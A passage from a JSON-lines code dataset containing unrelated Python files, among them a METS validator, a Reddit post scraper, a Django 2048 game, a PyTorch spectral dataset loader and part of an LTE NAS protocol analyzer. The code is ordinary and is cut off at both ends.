rep_validator.validate_mets(os.path.join(to_validate,\n file_ref.path))\n mets_files[key] = rep_validator.file_refs\n profile = ValidationProfile()\n schematron_results['root'] = profile.validate(mets_path, struct_map['root'])\n all_schm_status = MetadataStatus.VALID\n all_schm_mssg = []\n all_schmtrn_status = MetadataStatus.VALID\n all_schmtrn_mssg = []\n for key, (schema_valid, results) in schema_results.items():\n all_schm_mssg+=results.messages\n print('Checking METS validation: ', key)\n if schema_valid:\n print('Schema validation succeeded for: ', key)\n if key == 'root':\n print('root METS schematron: ')\n schematron_valid, schematron_result = schematron_results['root']\n else:\n mets_ref = validator.represent_mets[key]\n schematron_valid, schematron_result = profile.validate(os.path.join(to_validate,\n mets_ref.path),\n struct_map[key], False)\n if not schematron_valid:\n all_schmtrn_status = MetadataStatus.NOTVALID\n all_schmtrn_mssg+=schematron_result.messages\n else:\n all_schm_status = MetadataStatus.NOTVALID\n all_schmtrn_status = MetadataStatus.NOTVALID\n manifest_errors = _check_manifest(to_validate, mets_files)\n if manifest_errors:\n all_schmtrn_status = MetadataStatus.NOTVALID\n all_schmtrn_mssg+=manifest_errors\n\n return profile.get_details(), MetadataResults(MetadataChecks(all_schm_status,\n all_schm_mssg),\n MetadataChecks(all_schmtrn_status,\n all_schmtrn_mssg))\n\ndef _check_manifest(to_validate, mets_refs):\n algs = set()\n for refs in mets_refs.values():\n for ref in refs:\n if ref.checksum:\n algs.add(ref.checksum.algorithm)\n manifest = MNFST.manifest_from_directory(to_validate, checksum_algs=algs)\n return _get_manifest_errors(mets_refs, manifest)\n\ndef _get_manifest_errors(mets_refs, manifest):\n errors = []\n for key, refs in mets_refs.items():\n for file_ref in refs:\n errors += _proc_file_ref(file_ref, key, manifest)\n return errors\n\ndef _proc_file_ref(file_ref, key, manifest):\n errors = []\n ref_path = str(file_ref.path) if key == 'root' else os.path.join('representations',\n key,\n str(file_ref.path))\n for entry in manifest.entries:\n if entry.path == ref_path:\n errors += _check_manifest_entry(entry, file_ref, key)\n return errors\n\ndef _check_manifest_entry(entry, file_ref, key):\n errors = []\n if str(entry.size) != str(file_ref.size):\n errors.append(TestResult('CSIP69',\n 'mets/fileSec/fileGrp/file/@SIZE',\n 'mets/fileSec/fileGrp/file/@SIZE: {} declared in {} {} '\n 'and size of file {}: {} isn\\'t equal.'.format(file_ref.size,\n key,\n entry.path,\n entry.size,\n METS_FILENAME),\n Severity.ERROR))\n checksum_matched = False\n if file_ref.checksum:\n for checksum in entry.checksums:\n if file_ref.checksum and checksum == file_ref.checksum:\n checksum_matched = True\n if not checksum_matched:\n errors.append(TestResult('CSIP71',\n 'mets/fileSec/fileGrp/file/@CHECKSUM',\n 'mets/fileSec/fileGrp/file/@CHECKSUM: {} declared in {} {} '\n 'and checksum of file {} isn\\'t equal.'.format(file_ref.checksum.value,\n key,\n entry.path,\n METS_FILENAME),\n Severity.ERROR))\n return errors\n ","repo_name":"carlwilson/eark-ip","sub_path":"eark_ip_valid/eark_ip/api/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":17631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14576376908","text":"# https://dgsw.goorm.io/exam/132233/%EC%BD%94%EB%94%A9%ED%85%8C%EC%8A%A4%ED%8A%B81/quiz/12 #\n\ndef sort1(s):\n #리스트 컴프리헨션\n s1=[a for a in s if a<0] #음수\n s2=[b for b in s if b>=0] #양수\n return s1+s2\n\nli=list(map(int,input().split()))\nr=sort1(li)\nprint(*r)","repo_name":"oheunji05/Coding-test","sub_path":"Python/이상한 정렬.py","file_name":"이상한 정렬.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2958694723","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPerforms fetch.py on these time settings\n\"\"\"\n\nfrom crontab import CronTab\n#init cron\ncron = CronTab()\n\n#add new cron job\njob = cron.new(command='fetch.py')\n\n#job settings\njob.hour.every(4)\n","repo_name":"colmoneill/Jason-Scraper","sub_path":"cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30643937945","text":"import torch \nimport numpy as np \nimport pandas as pd \nimport h5py\nfrom torch.utils.data.dataset import Dataset\n\nclass Pixel2PixelDataset(Dataset):\n\n def __init__(self, dir_name, image_names=['minos'], sample_step = 1, device='cuda', band_range=(80, 2128), \n target_elems=['S_K','K_K','Ca_K','Cr_K','Mn_K','Fe_K','Cu_K','Zn_K','Sr_K','Au_L','Hg_L','Pb_L'] ): \n\n self.dir_name = dir_name\n self.image_names = image_names\n self.sample_step = sample_step\n self.device = device\n self.band_min, self.band_max = band_range\n self.target_elems = target_elems\n self.X = []; self.y = []\n\n self.train_spec_files = [self.dir_name + '/spec/' + x + '.hdf5' for x in self.image_names]\n self.train_elem_files = [self.dir_name + '/elem_maps/' + x +'.dat' for x in self.image_names]\n\n ## Initialize Train and Validation datasets\n for i_spec, spec_file in enumerate(self.train_spec_files):\n\n ## Open spectral image file\n f = h5py.File(spec_file, 'r')\n spec_image = f['Experiments/__unnamed__/data'][()] # numpy.ndarray \n f.close()\n spec_image = spec_image.reshape(\n spec_image.shape[0]*spec_image.shape[1], spec_image.shape[2]\n )\n spec_image = spec_image[:,self.band_min:self.band_max]\n \n ## Open target image file (elemental_maps)\n target_file = spec_file.replace(\"spec\", \"elem_maps\")\n target_file = target_file.replace(\"hdf5\", \"dat\")\n df = pd.read_csv(target_file , sep=' ', engine='python')\n target_image = np.array(df[self.target_elems])\n\n ## Keep a subset of spectra dataset (default: 10%)\n for idx, spectra in enumerate(spec_image):\n if(idx % self.sample_step == 0):\n x = np.expand_dims(spectra, axis=0).astype(np.float32)\n x = torch.tensor(x)\n self.X.append(x)\n y = torch.tensor(target_image[idx].astype(np.float32))\n self.y.append(y)\n\n def __getitem__(self, index):\n x_in, y_in = self.X[index], self.y[index]\n return x_in.to(self.device), y_in.to(self.device)\n\n def __len__(self):\n return len(self.X)\n\n\nif __name__ == \"__main__\":\n directory = '/home/igeor/MSC-THESIS/data/h5'\n dataset = Pixel2PixelDataset(directory, sample_step=10, device='cuda', band_range=(80, 2128), \n image_names=['gogo', 'saintjohn', 'dionisios', 'fanourios', 'odigitria', 'minos'])\n \n from torch import nn \n fcn = nn.Sequential(\n nn.Linear(2048, 512),\n nn.ReLU(),\n nn.Linear(512, 64),\n nn.ReLU(),\n nn.Linear(64, 12)\n ).to('cuda')\n\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=32, shuffle=True)\n optimizer = torch.optim.Adam(fcn.parameters(), lr=0.01)\n\n for epoch in range(100):\n epoch_loss = 0.0\n for x, y in dataloader:\n y_hat = fcn(x)\n loss = nn.MSELoss()(y_hat, y)\n epoch_loss += loss.item() / len(dataloader)\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n print(f'Epoch: {epoch} | Loss: {epoch_loss}')\n","repo_name":"igeor/Elemental-Distribution-Mapping-with-Deep-Learning-Methods","sub_path":"Elemental_Mapping/datasets/Pixel2PixelDataset.py","file_name":"Pixel2PixelDataset.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27904479603","text":"import json\r\nimport praw \r\nfrom WriteToTXT import WriteToTxt\r\nimport threading\r\n\r\n# TODO: Idea is to scrape all the titles and upvotes for each title and make some calculation to buy or ignore/sell a stock\r\n# TODO: change csv file to txt file\r\n\r\nuser_agent = \"Scraper 1.0 by /u/Constant-Yam531\"\r\n\r\n#stock_ticker_mention_count = 0\r\n#stock_ticker = input(\"What stock do you want to SCRAPE?: \")\r\n\r\ncredentials = 'client_secrets.json'\r\n\r\nwith open(credentials) as f:\r\n creds = json.load(f)\r\n\r\nreddit = praw.Reddit(\r\n client_id = creds['client_id'],\r\n client_secret = creds['client_secret'],\r\n user_agent = creds['user_agent'],\r\n redirect_uri = creds['redirect_uri']\r\n)\r\n\r\ndef newPosts(): \r\n threading.Timer(5.0,newPosts).start()\r\n with open('wsbnew.csv', 'r') as f:\r\n for line in f:\r\n pass\r\n last_line = line\r\n previous_submission_title = last_line\r\n\r\n #print(previous_submission_title)\r\n\r\n headlines = set()\r\n for submission in reddit.subreddit('wallstreetbets').new(limit=1):\r\n #print(submission.title)\r\n #print(submission.id)\r\n #print(submission.author)\r\n #print(submission.created_utc)\r\n #print(submission.score)\r\n #print(submission.upvote_ratio)\r\n #print(submission.url)\r\n #break\r\n #print(submission.title)\r\n headlines.add(submission.title)\r\n\r\n # Don't need this in new but do it for hot and top\r\n # the_submission = reddit.submission(submission.id)\r\n # the_submission.comments.replace_more(limit=None)\r\n # for comment in the_submission.comments.list():\r\n # print(comment.body)\r\n\r\n #submission_title = submission.title\r\n #print(submission.title)\r\n #print(submission_title)\r\n print(submission.title)\r\n PleaseWriteToTXT = WriteToTxt()\r\n\r\n #filename = 'wsbnew.csv'S\r\n\r\n if(submission.title != previous_submission_title):\r\n PleaseWriteToTXT.append_to_csv(submission.title)\r\n\r\ndef topPosts(): \r\n threading.Timer(5.0,topPosts).start()\r\n with open('wsbnew.csv', 'r') as f:\r\n for line in f:\r\n pass\r\n last_line = line\r\n previous_submission_title = last_line\r\n\r\n headlines = set()\r\n for submission in reddit.subreddit('wallstreetbets').top(limit=1):\r\n headlines.add(submission.title)\r\n\r\n print(submission.title)\r\n PleaseWriteToCSV = WriteToTxt()\r\n\r\n #filename = 'wsbnew.csv'S\r\n\r\n if(submission.title != previous_submission_title):\r\n PleaseWriteToCSV.append_to_csv(submission.title)\r\n\r\ndef hotPosts(): \r\n threading.Timer(5.0,hotPosts).start()\r\n with open('wsbnew.csv', 'r') as f:\r\n for line in f:\r\n pass\r\n last_line = line\r\n previous_submission_title = last_line\r\n\r\n #headlines = set()\r\n headlines = {\r\n\r\n }\r\n\r\n count = 0\r\n for submission in reddit.subreddit('wallstreetbets').hot(limit=100):\r\n #headlines[submission.title] = submission.score\r\n headlines[count] = [submission.title,submission.score]\r\n count = count + 1\r\n #headlines.add(submission.title)\r\n\r\n #print(submission.title)\r\n #print(list(headlines)[10])\r\n #print(headlines)\r\n PleaseWriteToTXT = WriteToTxt()\r\n\r\n #filename = 'wsbnew.csv'S\r\n print(headlines[0][1])\r\n count = 0\r\n while(count < 100):\r\n PleaseWriteToTXT.append_to_txt(headlines[count][0])\r\n count = count + 1\r\n \r\n\r\nhotPosts()\r\n#topPosts()\r\n# newPosts()\r\n\r\n# TO DO LATER: Go into the post and scrape the comments too. \r\n","repo_name":"ForMeCodingIsLikeTypeRacer/WSBTime","sub_path":"wsbtracker.py","file_name":"wsbtracker.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17081022497","text":"import copy\nimport json\nfrom django.shortcuts import render\nfrom game2048.lwgame.usl import GameConsoleView\n# Create your views here.\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\n\nfrom game2048.models import Top_ten\n\narray_new = [\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n ]\na = GameConsoleView(array_new)\n\ndef ht2048(request):\n # array = [[2, 8, 4, 2], [4, 32, 16, 8], [16, 128, 8, 2], [32, 2, 32, 16]]\n # 把新地图放入启动函数\n array = a.start(array_new)\n # print('start nadao map',array)\n\n # 后端处理cookie,失败,改用js处理\n # resp = render(request, 'ht2048.html', locals())\n # arr = []\n # for item in array:\n # i = [str(i) for i in item]\n # for c in i:\n # arr.append(c)\n #arr = json.dumps(array)\n #\"['4'\\054 '0'\\054 '2'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0']\"\n #resp.set_cookie('arr', arr, 30 * 60 * 1000)\n\n return render(request, 'ht2048.html', locals())\n\ndef on(request):\n # print('这是 on ----------------')\n\n #拿到cook的值,转换成[[],[],[],[]]\n cook_arr = request.COOKIES.get('arr', '没有值!')\n cook_arr = cook_arr.split(',')[:16]\n cook_arr = [int(i) for i in cook_arr]\n array = []\n array.append(cook_arr[:4])\n array.append(cook_arr[4:8])\n array.append(cook_arr[8:12])\n array.append(cook_arr[12:16])\n print(array)\n\n # v1.2版本处理方案,深拷贝地图做到并发 ->失败(无法识别游览器用户) 解决方案(cookie)\n # array = arr_map()\n # print('nadao map',array)\n\n #将cookie拿到的值,传入逻辑函数处理\n if 'on' in request.GET.keys():\n on = request.GET['on']\n if on == 'up':\n array = a.update('w',array)\n elif on == 'down':\n array = a.update('s',array)\n elif on == 'left':\n array = a.update('a',array)\n elif on == 'right':\n array = a.update('d',array)\n\n if array[len(array)-1] == 'over':\n print('游戏结束')\n\n if array == '没有变化':\n res = {'val': array}\n print(res)\n return JsonResponse(res)\n\n num_array = copy.deepcopy(array)\n try:\n # 积分统计\n array = num(num_array)\n except Exception as e:\n print(e)\n print('按的太快了')\n\n res = {'val':array}\n print(res)\n return JsonResponse(res)\n\n# 添加排名\ndef top_ten_add(request):\n\n if request.method == 'GET':\n num = request.GET['num']\n num = int(num[:-1])\n name = request.GET['name']\n Top_ten.objects.create(nickname=name,result=num)\n\n return HttpResponse('ok')\n\n# 查看排名\ndef top_ten(request):\n\n print('topten ok')\n top_all = Top_ten.objects.order_by('-result')[:10]\n\n return render(request,'top_ten.html',locals())\n\n# 积分计算函数\ndef num(array):\n num = 0\n for i in array:\n for c in i:\n num += c\n array.append(num)\n return array\n\n\n# def arr_map():\n # num_array = copy.deepcopy(array)\n # return array_new\n\n# def arr_obj(array):\n#\n# array_new = array[0:3]\n#\n# return array_new","repo_name":"satori369/2048html","sub_path":"game2048/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70060973928","text":"import cv2 as cv\nimport sys\n\nimg = cv.imread(\"./img/dog.jpg\")\n\nif img is None:\n sys.exit(\"이미지를 불러올 수 없습니다\")\n\ngray = cv.cvtColor(img , cv.COLOR_BGR2GRAY)\n\ncanny1 = cv.Canny(gray, 50, 150)\ncanny2 = cv.Canny(gray, 100, 200)\n\ncv.imshow(\"Original\" , gray)\ncv.imshow(\"Canny1\" , canny1)\ncv.imshow(\"Canny2\" , canny2)\n\ncv.waitKey()\ncv.destroyAllWindows()","repo_name":"Mkpong/ComputerVision","sub_path":"CV-4-1/Canny_edge.py","file_name":"Canny_edge.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72906160808","text":"#!/usr/bin/python\n# Filename: lte_nas_analyzer.py\n\"\"\"\n\nA LTE NAS layer (EMM/ESM) analyzer\n\nAuthor: Yuanjie Li\n Zengwen Yuan\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nfrom .analyzer import *\nfrom .state_machine import *\nimport timeit\n\nfrom .protocol_analyzer import *\nfrom .profile import Profile, ProfileHierarchy\n\nfrom .nas_util import *\n\n__all__=[\"LteNasAnalyzer\"]\n\n#EMM registeration state \nemm_state={0:\"deregistered\",1:\"registered\"}\n\n#EMM registeration substate \nemm_substate={\n 0: \"deregistered.normal_service\",\n 1: \"deregistered.limited_service\",\n 2: \"deregistered.attempting_to_attach\",\n 3: \"deregistered.plmn_search\",\n 4: \"deregistered.no_imsi\",\n 5: \"deregistered.attach_needed\",\n 6: \"deregistered.no_cell_available\",\n 7: \"registered.normal_service\",\n 8: \"registered.attempting_to_update\",\n 9: \"registered.limited_service\",\n 10: \"registered.plmn_search\",\n 11: \"registered.updated_needed\",\n 12: \"registered.no_cell_available\",\n 13: \"registered.attempting_to_update_mm\",\n 14: \"registered.imsi_detach_inited\"}\n\n#ESM session connection state\nesm_state={0:\"disconnected\", 1:\"connected\", -1:\"disconnected\"}\n\n# class LteNasAnalyzer(Analyzer):\nclass LteNasAnalyzer(ProtocolAnalyzer):\n\n \"\"\"\n A protocol analyzer for LTE NAS messages (EMM and ESM)\n \"\"\"\n\n def __init__(self):\n\n ProtocolAnalyzer.__init__(self)\n #init packet filters\n self.add_source_callback(self.__nas_filter)\n #EMM/ESM status initialization\n self.__emm_status = EmmStatus()\n self.__esm_status = {} #EPS ID -> EsmStatus()\n #####use EPS bearer ID or EPS bearer state????\n self.__cur_eps_id = None\n # self.__esm_status = EsmStatus()\n self.esm_state_machine = self.create_esm_state_machine()\n self.emm_state_machine = self.create_emm_state_machine()\n self.callflow_state_machine = self.create_callflow_state_machine()\n\n def create_profile_hierarchy(self):\n '''\n Return a Lte NAS ProfileHierarchy (configurations)\n\n :returns: ProfileHierarchy for LTE NAS\n '''\n return LteNasProfileHierarchy()\n\n def set_source(self,source):\n \"\"\"\n Set the trace source. Enable the LTE NAS messages.\n\n :param source: the trace source (collector).\n \"\"\"\n Analyzer.set_source(self,source)\n #Enable EMM/ESM logs\n source.enable_log(\"LTE_NAS_ESM_OTA_Incoming_Packet\")\n source.enable_log(\"LTE_NAS_ESM_OTA_Outgoing_Packet\")\n source.enable_log(\"LTE_NAS_EMM_OTA_Incoming_Packet\")\n source.enable_log(\"LTE_NAS_EMM_OTA_Outgoing_Packet\")\n source.enable_log(\"LTE_NAS_EMM_State\")\n source.enable_log(\"LTE_NAS_ESM_State\")\n\n def create_callflow_state_machine(self):\n \"\"\"\n Declare a callflow state machine\n\n returns: a StateMachine\n \"\"\"\n\n def idle_to_csfb(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n extended_service_req_flag = False\n for field in msg.data.iter('field'):\n if field.get('name') == 'nas_eps.nas_msg_emm_type' and field.get('value') == '4c':\n extended_service_req_flag = True\n elif extended_service_req_flag and field.get('name') == 'nas_eps.emm.service_type' \\\n and (field.get('show') == '0' or field.get('show') == '1'):\n return True\n\n\n def idle_to_volte(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n act_bearer_flag = False\n for proto in msg.data.iter('proto'):\n if proto.get('name') == 'nas-eps':\n for field in proto.iter('field'):\n # print ET.dump(field)\n if field.get('name') == 'nas_eps.nas_msg_esm_type' and field.get('value') == 'c5':\n act_bearer_flag = True\n elif act_bearer_flag and field.get('show') == 'EPS quality of service':\n # print ET.dump(field)\n for val in field.iter('field'):\n if val.get('name') == 'nas_eps.emm.qci' and val.get('show') == '1':\n # print ET.dump(val)\n return True\n\n\n def con_to_volte(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n deact_bearer_flag = False\n for proto in msg.data.iter('proto'):\n if proto.get('name') == 'nas-eps':\n for field in proto.iter('field'):\n if field.get('value') == 'cd': # Deactivate EPS bearer context request (0xcd)\n deact_bearer_flag = True\n elif deact_bearer_flag and field.get('show') == 'ESM cause':\n for val in field.iter('field'):\n if val.get('name') == 'nas_eps.esm.cause' and val.get('show') == '36':\n return True\n\n\n def csfb_to_idle(msg):\n if msg.type_id == 'LTE_NAS_EMM_State' and msg.data[\"EMM Substate\"] == 'EMM_REGISTERED_NORMAL_SERVICE':\n return True\n\n def volte_to_con(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n act_bearer_flag = False\n for proto in msg.data.iter('proto'):\n if proto.get('name') == 'nas-eps':\n # print ET.dump(proto)\n for field in proto.iter('field'):\n if field.get('value') == 'c6': # Activate dedicated EPS bearer context accept (0xc6)\n act_bearer_flag = True\n # TODO: add check on bearer id\n return True\n\n def volte_to_idle(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n deact_bearer_flag = False\n for proto in msg.data.iter('proto'):\n if proto.get('name') == 'nas-eps':\n for field in proto.iter('field'):\n if field.get('value') == 'ce': # Deactivate EPS bearer context accept (0xce)\n deact_bearer_flag = True\n # TODO: add check on bearer id\n return True\n\n def init_state(msg):\n return 'IDLE'\n\n state_machine={'IDLE': {'CALL_FALLBACK': idle_to_csfb, 'VoLTE_PROCESSING': idle_to_volte},\n 'CONNECTED': {'VoLTE_PROCESSING': con_to_volte},\n 'CALL_FALLBACK': {'IDLE': csfb_to_idle},\n 'VoLTE_PROCESSING': {'CONNECTED': volte_to_con, 'IDLE': volte_to_idle}}\n\n return StateMachine(state_machine, init_state)\n\n\n def create_esm_state_machine(self):\n \"\"\"\n Declare a ESM state machine\n returns: a StateMachine\n \"\"\"\n\n def con_to_discon(msg):\n if int(msg.data[\"EPS bearer state\"]) - 1 == 0:\n return True\n\n def discon_to_con(msg):\n if int(msg.data[\"EPS bearer state\"]) - 1 == 1:\n return True\n\n def init_state(msg):\n if \"EPS bearer state\" not in msg.data:\n return \"ESM_DISCON\"\n elif int(msg.data[\"EPS bearer state\"]) - 1 == 0:\n return 'ESM_DISCON'\n elif int(msg.data[\"EPS bearer state\"]) - 1 == 1:\n return 'ESM_CON'\n\n state_machine = {'ESM_CON': {'ESM_DISCON': con_to_discon},\n 'ESM_DISCON': {'ESM_CON': discon_to_con}}\n\n return StateMachine(state_machine, init_state)\n\n\n def create_emm_state_machine(self):\n \"\"\"\n Declare a EMM state machine\n\n returns: a StateMachine\n \"\"\"\n\n def to_deregister(msg):\n if msg.data[\"EMM State\"] == 'EMM_DEREGISTERED':\n return True\n\n def to_deregister_init(msg):\n if msg.data[\"EMM State\"] == 'EMM_DEREGISTERED_INITIATED':\n return True\n\n def to_register(msg):\n if msg.data[\"EMM State\"] == 'EMM_REGISTERED':\n return True\n\n def to_register_init(msg):\n if msg.data[\"EMM State\"] == 'EMM_REGISTERED_INITIATED':\n return True\n\n def init_state(msg):\n if msg.data[\"EMM State\"] in ['EMM_REGISTERED', 'EMM_REGISTERED_INITIATED', 'EMM_DEREGISTERED',\n 'EMM_DEREGISTERED_INITIATED']:\n return msg.data[\"EMM State\"]\n\n state_machine={'EMM_REGISTERED': {'EMM_DEREGISTERED': to_deregister, 'EMM_DEREGISTERED_INITIATED': to_deregister_init},\n 'EMM_REGISTERED_INITIATED': {'EMM_REGISTERED': to_register, 'EMM_DEREGISTERED': to_deregister},\n 'EMM_DEREGISTERED': {'EMM_REGISTERED_INITIATED': to_register_init},\n 'EMM_DEREGISTERED_INITIATED': {'EMM_DEREGISTERED': to_deregister}}\n\n return StateMachine(state_machine, init_state)\n\n def __nas_filter(self,msg):\n \"\"\"\n Filter all NAS(EMM/ESM) packets, and call functions to process it\n\n :param msg: the event (message) from the trace collector.\n \"\"\"\n\n if msg.type_id == \"LTE_NAS_ESM_OTA_Incoming_Packet\" \\\n or msg.type_id == \"LTE_NAS_ESM_OTA_Outgoing_Packet\" \\\n or msg.type_id == \"LTE_NAS_EMM_OTA_Incoming_Packet\" \\\n or msg.type_id == \"LTE_NAS_EMM_OTA_Outgoing_Packet\":\n log_item = msg.data.decode()\n log_item_dict = dict(log_item)\n\n # if not log_item_dict.has_key('Msg'):\n if 'Msg' not in log_item_dict:\n return\n\n #Convert msg to xml format\n # log_xml = ET.fromstring(log_item_dict['Msg'])\n log_xml = ET.XML(log_item_dict['Msg'])\n xml_msg=Event(msg.timestamp,msg.type_id,log_xml)\n\n # print log_item_dict['Msg']\n\n # self.__callback_emm_state(xml_msg)\n self.__callback_emm(xml_msg)\n self.__callback_esm(xml_msg)\n\n self.send(msg)\n\n if msg.type_id == \"LTE_NAS_EMM_State\":\n log_item = msg.data.decode()\n log_item_dict = dict(log_item)\n\n raw_msg = Event(msg.timestamp,msg.type_id,log_item_dict)\n self.__callback_emm_state(raw_msg)\n if self.emm_state_machine.update_state(raw_msg):\n self.log_info(\"EMM state: \" + str(self.emm_state_machine.get_current_state()))\n\n self.send(msg)\n\n if msg.type_id == \"LTE_NAS_ESM_State\":\n log_item = msg.data.decode()\n log_item_dict = dict(log_item)\n raw_msg = Event(msg.timestamp,msg.type_id,log_item_dict)\n self.__callback_esm_state(raw_msg)\n if self.esm_state_machine.update_state(raw_msg):\n self.log_info(\"ESM state: \" + self.esm_state_machine.get_current_state())\n\n self.send(msg)\n\n def __callback_emm_state(self,msg):\n \"\"\"\n Given the EMM message, update EMM state and substate.\n\n :param msg: the NAS signaling message that carries EMM state\n \"\"\"\n self.__emm_status.state = msg.data[\"EMM State\"]\n self.__emm_status.substate = msg.data[\"EMM Substate\"]\n tmp = msg.data[\"PLMN\"].split('-')\n self.__emm_status.guti.mcc = tmp[0]\n self.__emm_status.guti.mnc = tmp[1]\n self.__emm_status.guti.mme_group_id = msg.data[\"GUTI MME Group ID\"]\n self.__emm_status.guti.mme_code = msg.data[\"GUTI MME Code\"]\n self.__emm_status.guti.m_tmsi = msg.data[\"GUTI M-TMSI\"]\n self.log_info(self.__emm_status.dump())\n\n #broadcast\n state = {\n 'conn state': self.__emm_status.state,\n 'conn substate': self.__emm_status.substate,\n }\n\n # self.log_info('EMM_STATE', str(state))\n self.broadcast_info('EMM_STATE', state)\n\n if self.callflow_state_machine.update_state(msg):\n self.log_info(\"Call flow status: \" + str(self.callflow_state_machine.get_current_state()))\n\n\n\n def __callback_esm_state(self,msg):\n \"\"\"\n Given the ESM message, update ESM state\n\n :param msg: the NAS signaling message that carries EMM state\n \"\"\"\n self.__cur_eps_id = msg.data[\"EPS bearer ID\"]\n\n if self.__cur_eps_id not in self.__esm_status:\n self.__esm_status[self.__cur_eps_id] = EsmStatus()\n\n # print self.__cur_eps_id, str(self.__esm_status), str(bearer_type), msg.data[\"EPS bearer type\"], str(msg.data['timestamp'])\n\n self.__esm_status[self.__cur_eps_id].eps_id = int(msg.data[\"EPS bearer ID\"])\n self.__esm_status[self.__cur_eps_id].type = int(msg.data[\"EPS bearer type\"])\n if self.__esm_status[self.__cur_eps_id].type == 255:\n self.__esm_status[self.__cur_eps_id].type = 1\n self.__esm_status[self.__cur_eps_id].qos.qci = msg.data[\"QCI\"]\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink = msg.data[\"UL MBR\"]\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink = msg.data[\"DL MBR\"]\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink=msg.data[\"UL GBR\"]\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink=msg.data[\"DL MBR\"]\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink_ext=msg.data[\"UL MBR ext\"]\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink_ext=msg.data[\"DL MBR ext\"]\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink_ext=msg.data[\"UL GBR ext\"]\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink_ext=msg.data[\"DL MBR ext\"]\n\n self.__esm_status[self.__cur_eps_id].timestamp = msg.data[\"timestamp\"]\n\n self.log_info(self.__esm_status[self.__cur_eps_id].dump())\n\n self.profile.update(\"LteNasProfile:\"+self.__emm_status.profile_id()+\".eps.qos:\"+bearer_type[self.__esm_status[self.__cur_eps_id].type],\n {'qci':self.__esm_status[self.__cur_eps_id].qos.qci,\n 'max_bitrate_ulink':self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink,\n 'max_bitrate_dlink':self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink,\n 'guaranteed_bitrate_ulink':self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink,\n 'guaranteed_bitrate_dlink':self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink,\n 'max_bitrate_ulink_ext':self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink_ext,\n 'max_bitrate_dlink_ext':self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink_ext,\n 'guaranteed_bitrate_ulink_ext':self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink_ext,\n 'guaranteed_bitrate_dlink_ext':self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink_ext,\n })\n\n # broadcast\n state = {\n 'conn state': esm_state[int(msg.data[\"EPS bearer state\"]) - 1],\n 'timestamp' : str(msg.data['timestamp'])\n }\n # self.log_info(str(state))\n self.broadcast_info('ESM_STATE', state)\n\n def __callback_emm(self,msg):\n \"\"\"\n Extract EMM status and configurations from the NAS messages\n\n :param msg: the EMM NAS message\n \"\"\"\n\n for field in msg.data.iter('field'):\n\n if field.get('show') == \"UE network capability\":\n # print str(ET.dump(field))\n for val in field.iter('field'):\n if val.get('name') == 'nas_eps.emm.acc_csfb_cap':\n csfb_cap = True if val.get('show') == '1' else False\n self.log_info(\"CSFB Capbility: \" + str(csfb_cap))\n bcast_dict = {}\n bcast_dict['cafb cap'] = str(csfb_cap)\n bcast_dict['timestamp'] = str(msg.timestamp)\n self.broadcast_info('CSFB_CAP', bcast_dict)\n\n\n if field.get('show')==\"EPS mobile identity - GUTI\":\n\n field_val={}\n\n field_val['e212.mcc']=None\n field_val['e212.mnc']=None\n field_val['nas_eps.emm.mme_grp_id']=None\n field_val['nas_eps.emm.mme_code']=None\n field_val['nas_eps.emm.m_tmsi']=None\n\n for val in field.iter('field'):\n field_val[val.get('name')]=val.get('show')\n\n self.__emm_status.guti.mcc=field_val['e212.mcc']\n self.__emm_status.guti.mnc=field_val['e212.mnc']\n self.__emm_status.guti.mme_group_id=field_val['nas_eps.emm.mme_grp_id']\n self.__emm_status.guti.mme_code=field_val['nas_eps.emm.mme_code']\n self.__emm_status.guti.m_tmsi=field_val['nas_eps.emm.m_tmsi']\n\n def __callback_esm(self,msg):\n \"\"\"\n Extract ESM status and configurations from the NAS messages\n\n :param 